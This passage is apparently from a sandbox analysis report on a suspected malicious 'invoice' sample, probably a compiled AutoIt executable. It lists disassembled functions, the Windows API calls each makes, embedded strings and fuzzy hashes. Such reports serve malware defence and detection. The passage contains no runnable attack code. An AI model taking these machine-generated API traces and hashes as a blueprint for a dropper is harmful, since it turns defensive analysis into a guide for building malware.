                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0100BA13
                        • DestroyIcon.USER32(?), ref: 0100BA22
                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0100BA3F
                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0100BA4B
                          • Part of subcall function 00FA307D: __wcsicmp_l.LIBCMT ref: 00FA3106
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                        • String ID: .dll$.exe$.icl
                        • API String ID: 1212759294-1154884017
                        • Opcode ID: bab4c9f13f08546e5172a0ec02010109c253fa26eaa49ed5856f8a89f03c40ce
                        • Instruction ID: fa4d2afe5b312b55a59b15372bf9a82be2f4186b3f3eb7404bd5063cd2b3b3be
                        • Opcode Fuzzy Hash: bab4c9f13f08546e5172a0ec02010109c253fa26eaa49ed5856f8a89f03c40ce
                        • Instruction Fuzzy Hash: A8610071600609BEFB26DF68CC45BBE7BA8FB09711F004119F995D61C1DB79AA80D7A0
                        APIs
                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                        • CharLowerBuffW.USER32(?,?), ref: 00FEA455
                        • GetDriveTypeW.KERNEL32 ref: 00FEA4A2
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FEA4EA
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FEA521
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FEA54F
                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                        • API String ID: 2698844021-4113822522
                        • Opcode ID: 77edff78ae629ac2673946cc83ae77b48ef97d85c189a905767771ce71116628
                        • Instruction ID: 7c90f343bd47a0414a77808a9adc57403f70ec0882f705fef6b5f13160480b9a
                        • Opcode Fuzzy Hash: 77edff78ae629ac2673946cc83ae77b48ef97d85c189a905767771ce71116628
                        • Instruction Fuzzy Hash: B35149711083049FC700EF21CC919AAB7E8FF88718F14895DF88697261DB35EE0ADB82
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00FBE382,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00FDFC10
                        • LoadStringW.USER32(00000000,?,00FBE382,00000001), ref: 00FDFC19
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                        • GetModuleHandleW.KERNEL32(00000000,01045310,?,00000FFF,?,?,00FBE382,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00FDFC3B
                        • LoadStringW.USER32(00000000,?,00FBE382,00000001), ref: 00FDFC3E
                        • __swprintf.LIBCMT ref: 00FDFC8E
                        • __swprintf.LIBCMT ref: 00FDFC9F
                        • _wprintf.LIBCMT ref: 00FDFD48
                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FDFD5F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                        • API String ID: 984253442-2268648507
                        • Opcode ID: 47066d89ebf7ac64a9d8372fa12063304a7b87b0f5634e2bac8598ec069d3b39
                        • Instruction ID: be34a7d5c5bf0213e0029d09ced5af396488d6188d11acf339e766b4e0d8e2b4
                        • Opcode Fuzzy Hash: 47066d89ebf7ac64a9d8372fa12063304a7b87b0f5634e2bac8598ec069d3b39
                        • Instruction Fuzzy Hash: 56415072804209ABCF15FBE1CD86EEEB779AF14700F240165F50676091DB39AF09EBA0
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                        • String ID:
                        • API String ID: 884005220-0
                        • Opcode ID: 0da1b9af53ff8b04a44514167fa6b28159ab40532a99f7f879f00b963d87933e
                        • Instruction ID: c33129dc71202716fa5c57933fb85563a68dec81f2b14f0fd437c06ba829246e
                        • Opcode Fuzzy Hash: 0da1b9af53ff8b04a44514167fa6b28159ab40532a99f7f879f00b963d87933e
                        • Instruction Fuzzy Hash: 7961F7B2900211EFD720AF26DD417EA7BA8FF41770F20811AE8519B191EB7DD941EF62
                        APIs
                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0100BA8A
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0100BAA1
                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0100BAAC
                        • CloseHandle.KERNEL32(00000000), ref: 0100BAB9
                        • GlobalLock.KERNEL32(00000000), ref: 0100BAC2
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0100BAD1
                        • GlobalUnlock.KERNEL32(00000000), ref: 0100BADA
                        • CloseHandle.KERNEL32(00000000), ref: 0100BAE1
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0100BAF2
                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,01012CAC,?), ref: 0100BB0B
                        • GlobalFree.KERNEL32(00000000), ref: 0100BB1B
                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 0100BB3F
                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0100BB6A
                        • DeleteObject.GDI32(00000000), ref: 0100BB92
                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0100BBA8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                        • String ID:
                        • API String ID: 3840717409-0
                        • Opcode ID: e85eef54a80048097ea0f22f7aa399b976b89817d991facab4b57a1f70a9182e
                        • Instruction ID: 1bfcd0f8ea66e6b035caa0501499a98c99a2f48a5fc020e8048c86c604e46b59
                        • Opcode Fuzzy Hash: e85eef54a80048097ea0f22f7aa399b976b89817d991facab4b57a1f70a9182e
                        • Instruction Fuzzy Hash: 98416B38600209BFEB32DF69DC88EAA7BB8FF8A711F104058F985D7294D7759941DB20
                        APIs
                        • __wsplitpath.LIBCMT ref: 00FEDA9C
                        • _wcscat.LIBCMT ref: 00FEDAB4
                        • _wcscat.LIBCMT ref: 00FEDAC6
                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FEDADB
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00FEDAEF
                        • GetFileAttributesW.KERNEL32(?), ref: 00FEDB07
                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00FEDB21
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00FEDB33
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                        • String ID: *.*
                        • API String ID: 34673085-438819550
                        • Opcode ID: 722c97110cf050dfd889b829de43497000a7e799367c344a44f056c254bd808e
                        • Instruction ID: 0f3d1ba0b4c46d57b71bc06dc0bc2c88ebacf29a824dd15d67fe3561c4cd14e1
                        • Opcode Fuzzy Hash: 722c97110cf050dfd889b829de43497000a7e799367c344a44f056c254bd808e
                        • Instruction Fuzzy Hash: F081A8729082819FCB24EF55C84496EB7E8FF85710F18482EF485D7652E738DE44EB52
                        APIs
                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0100C266
                        • GetFocus.USER32 ref: 0100C276
                        • GetDlgCtrlID.USER32(00000000), ref: 0100C281
                        • _memset.LIBCMT ref: 0100C3AC
                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0100C3D7
                        • GetMenuItemCount.USER32(?), ref: 0100C3F7
                        • GetMenuItemID.USER32(?,00000000), ref: 0100C40A
                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0100C43E
                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0100C486
                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0100C4BE
                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0100C4F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                        • String ID: 0
                        • API String ID: 1296962147-4108050209
                        • Opcode ID: 321b6b03b1778176b0485e790ae9f3d7c7b8405e1a45b2b6f2f56ff2f17c044f
                        • Instruction ID: 3a23e9bd0e15a2999b5c313436bb8a9999c023254bc78de99abf579794d136f9
                        • Opcode Fuzzy Hash: 321b6b03b1778176b0485e790ae9f3d7c7b8405e1a45b2b6f2f56ff2f17c044f
                        • Instruction Fuzzy Hash: 54817E711083019FF762DF18DA84A6B7BE8FB88314F0146ADF9D597291CB31D905DB92
                        APIs
                        • GetDC.USER32(00000000), ref: 00FF74A4
                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00FF74B0
                        • CreateCompatibleDC.GDI32(?), ref: 00FF74BC
                        • SelectObject.GDI32(00000000,?), ref: 00FF74C9
                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00FF751D
                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00FF7559
                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00FF757D
                        • SelectObject.GDI32(00000006,?), ref: 00FF7585
                        • DeleteObject.GDI32(?), ref: 00FF758E
                        • DeleteDC.GDI32(00000006), ref: 00FF7595
                        • ReleaseDC.USER32(00000000,?), ref: 00FF75A0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                        • String ID: (
                        • API String ID: 2598888154-3887548279
                        • Opcode ID: a532db2ed1cc2c103c32368f8fe9dc64d81e509877c8217dba104a1985d7b97f
                        • Instruction ID: 02b773e1525cac0fb0b91b64b12f413ea57015350e495d4495e4a0a3f79355cf
                        • Opcode Fuzzy Hash: a532db2ed1cc2c103c32368f8fe9dc64d81e509877c8217dba104a1985d7b97f
                        • Instruction Fuzzy Hash: E4514B75904309EFCB25DFA8DC85EAEBBB9EF48310F14841DFA9997220D735A940DB60
                        APIs
                          • Part of subcall function 00FA0AD7: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00F86C6C,?,00008000), ref: 00FA0AF3
                          • Part of subcall function 00F848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F848A1,?,?,00F837C0,?), ref: 00F848CE
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F86D0D
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F86E5A
                          • Part of subcall function 00F859CD: _wcscpy.LIBCMT ref: 00F85A05
                          • Part of subcall function 00FA37BD: _iswctype.LIBCMT ref: 00FA37C5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                        • API String ID: 537147316-1018226102
                        • Opcode ID: cb2e17a8907e9bf4c8e5e363bcf2abc042c20b366e7c87e8a0b1b4b7d0fc441e
                        • Instruction ID: 8b09422b359d09e3a24143092dcff20176f7ffb2f125800780d81c82a7e04178
                        • Opcode Fuzzy Hash: cb2e17a8907e9bf4c8e5e363bcf2abc042c20b366e7c87e8a0b1b4b7d0fc441e
                        • Instruction Fuzzy Hash: 0402B8715083419FC724EF20C881AEFBBE5EF99314F14491DF48A972A1DB38E949EB42
                        APIs
                        • _memset.LIBCMT ref: 00F845F9
                        • GetMenuItemCount.USER32(01045890), ref: 00FBD6FD
                        • GetMenuItemCount.USER32(01045890), ref: 00FBD7AD
                        • GetCursorPos.USER32(?), ref: 00FBD7F1
                        • SetForegroundWindow.USER32(00000000), ref: 00FBD7FA
                        • TrackPopupMenuEx.USER32(01045890,00000000,?,00000000,00000000,00000000), ref: 00FBD80D
                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00FBD819
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                        • String ID:
                        • API String ID: 2751501086-0
                        • Opcode ID: 2c4d489640a0b12fe8d946846be56f9d6bb51283ee3c46340ddffb94bedfdc9e
                        • Instruction ID: ba851408580aaa2bbaf152d53b7199e0dac5da46f920f34876096f8aa239bd77
                        • Opcode Fuzzy Hash: 2c4d489640a0b12fe8d946846be56f9d6bb51283ee3c46340ddffb94bedfdc9e
                        • Instruction Fuzzy Hash: C471E371A0021ABFEB319F16DC45FEAFF69FB05364F240216F518A61D0D7B66810EB91
                        APIs
                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FFFE38,?,?), ref: 01000EBC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: BuffCharUpper
                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                        • API String ID: 3964851224-909552448
                        • Opcode ID: 8228a73dd565cd172bae1fb1213e2762539e1e357ca5155fa87db4c60f5a775d
                        • Instruction ID: fe6242044c4fd88d684fd5aaa25b2b7d308a397fc454a554ae248358a21f150d
                        • Opcode Fuzzy Hash: 8228a73dd565cd172bae1fb1213e2762539e1e357ca5155fa87db4c60f5a775d
                        • Instruction Fuzzy Hash: 1F418D7020028A8BEF12EF14EC91AEE3764BF46354F144458FCD15B296DFB9D919EB60
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00FBE5F9,00000010,?,Bad directive syntax error,0100F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00FDFAF3
                        • LoadStringW.USER32(00000000,?,00FBE5F9,00000010), ref: 00FDFAFA
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                        • _wprintf.LIBCMT ref: 00FDFB2D
                        • __swprintf.LIBCMT ref: 00FDFB4F
                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00FDFBBE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                        • API String ID: 1506413516-4153970271
                        • Opcode ID: b925ae12e841e5e02a8d259e0bd80672067f5418812372957bb131fdbdca7302
                        • Instruction ID: 9de038a710f62e8616418e1599e537aa63cc30afb73d0c6347aa0d16aadce9e8
                        • Opcode Fuzzy Hash: b925ae12e841e5e02a8d259e0bd80672067f5418812372957bb131fdbdca7302
                        • Instruction Fuzzy Hash: 6021607284031AABCF22FFA0CC56FEE7779BF18700F04449AF51566061DB79AA58EB50
                        APIs
                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                          • Part of subcall function 00F87A84: _memmove.LIBCMT ref: 00F87B0D
                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00FE53D7
                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00FE53ED
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FE53FE
                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00FE5410
                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00FE5421
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: SendString$_memmove
                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                        • API String ID: 2279737902-1007645807
                        • Opcode ID: 42f0f29280679e25f9d318e6d9c9a483afb1992407b9f5b4d09618ee8c039faf
                        • Instruction ID: 2ed5f0a8dba5704c0fe0d49262a33fa83a8fa5c7627098e43a6df133ca865e75
                        • Opcode Fuzzy Hash: 42f0f29280679e25f9d318e6d9c9a483afb1992407b9f5b4d09618ee8c039faf
                        • Instruction Fuzzy Hash: DD11E221A502697AD720F662CC8AEFFBA7CFBD5F40F00456AB401A60D1DA649E44DAA0
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                        • String ID: 0.0.0.0
                        • API String ID: 208665112-3771769585
                        • Opcode ID: 8c243c192587257629153202b7d028770acfc17c36c295437d724added67373c
                        • Instruction ID: b699e3b0b54dd2d12da21842aa29fc17f733aae002cfdd8102813fb07d031b6e
                        • Opcode Fuzzy Hash: 8c243c192587257629153202b7d028770acfc17c36c295437d724added67373c
                        • Instruction Fuzzy Hash: 25113A71A041156FCB31AB25EC4AEDA77BCEF43721F0401AAF445D6081EF79AA81B791
                        APIs
                        • timeGetTime.WINMM ref: 00FE5021
                          • Part of subcall function 00FA034A: timeGetTime.WINMM(?,75C0B400,00F90FDB), ref: 00FA034E
                        • Sleep.KERNEL32(0000000A), ref: 00FE504D
                        • EnumThreadWindows.USER32(?,Function_00064FCF,00000000), ref: 00FE5071
                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00FE5093
                        • SetActiveWindow.USER32 ref: 00FE50B2
                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00FE50C0
                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00FE50DF
                        • Sleep.KERNEL32(000000FA), ref: 00FE50EA
                        • IsWindow.USER32 ref: 00FE50F6
                        • EndDialog.USER32(00000000), ref: 00FE5107
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                        • String ID: BUTTON
                        • API String ID: 1194449130-3405671355
                        • Opcode ID: 84cc3b0df3e0ae5050617d76f75b5237c7b239cdfb9844fb1d61df0c8100dcba
                        • Instruction ID: 44e5b77be8e0643f4bbff8d4b7ebe1eceb92aa0cfe8e2279e141b09ac9d35e95
                        • Opcode Fuzzy Hash: 84cc3b0df3e0ae5050617d76f75b5237c7b239cdfb9844fb1d61df0c8100dcba
                        • Instruction Fuzzy Hash: 7721C6B4600746AFE7315F31EEC8F653B69E74A799F041018F18182198EB6F9D40B7A2
                        APIs
                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
